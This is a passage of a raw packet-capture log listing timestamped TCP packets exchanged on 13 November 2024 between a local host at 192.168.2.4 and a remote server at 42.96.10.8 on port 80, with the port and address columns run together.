                                                                                                                                                                                                            Nov 13, 2024 13:25:21.311887980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.311925888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.311942101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.311997890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312014103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312028885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312082052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312082052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312123060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312140942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312166929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312186003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312212944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312226057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312242985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312283039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312294006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312294006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312297106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312319994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312319994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312329054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312345982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312371969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312386990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312405109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312408924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312408924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312472105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312488079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312489033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312505960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312521935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312536955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312540054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312583923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312599897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312613964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312621117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312621117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312629938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312674999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312691927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312706947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312722921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312745094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312800884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312818050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312832117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312841892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312846899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312864065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312876940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312880039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312880039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312937975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312952042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.312966108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313004017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313009977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313009977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313021898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313040972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313060999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313062906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313080072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313096046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313103914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313112020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313129902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313132048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313147068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313163042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313163996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313179970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313189030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313198090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313219070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313304901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313321114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313338041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313352108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313368082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313383102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313396931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313397884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313397884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313414097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313435078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313452005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313452959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313468933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313544989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313544989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313554049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313570976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313585997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313601971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313617945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313633919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313652992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313652992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313652992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313677073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313693047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313709021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313724041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313760042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313791990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313807964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313822985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313841105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313868046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313880920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313895941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313910961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313920975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313920975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313920975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313925028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313980103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313980103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.313994884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314018965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314034939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314053059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314069986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314075947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314084053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314093113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314132929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314145088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314145088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314145088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314167023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314184904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314197063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314214945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314229965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314241886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314258099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314275026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314295053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314295053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314297915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314313889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314328909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314343929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314389944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314404011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314429045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314429045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314438105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314455032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314496040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314512014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314528942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314532995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314532995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314548016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314560890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314584970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314584970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314601898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314618111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314657927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314673901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314701080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314716101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314744949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314763069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314779997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314799070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314815044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314834118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314840078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314840078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314840078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314850092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314888000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314894915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314909935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.314924955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.315155983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.315155983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.315257072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322190046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322305918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322323084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322374105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322387934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322413921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322428942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322442055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322442055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322442055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322469950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322520018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322531939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322551012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322566986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322582960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322603941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322611094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322611094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322618008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322637081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322660923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322678089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322679996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322691917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322698116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322736025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322750092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322762966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322787046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322803020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322820902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322835922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322848082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322851896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322869062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322887897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322902918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322907925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322947025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322962999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322973967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322979927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.322997093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323003054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323019981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323034048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323040009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323051929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323065042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323096991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323096991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323102951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323117018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323136091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323173046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323189020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323203087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323261976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323276997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323276997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323278904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323297977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323319912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323354006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323363066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323385954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323415041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323430061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323446035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323455095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323462963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323489904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323503971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323520899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323520899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323520899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323546886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323556900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323565960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323584080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323626041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323641062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323654890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323654890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323656082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323673010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.323688984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324168921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324281931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324310064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324326038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324348927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324377060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324393034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324409008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324409008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324424028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324440956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324457884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324479103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324479103 CET4973380192.168.2.442.96.10.8
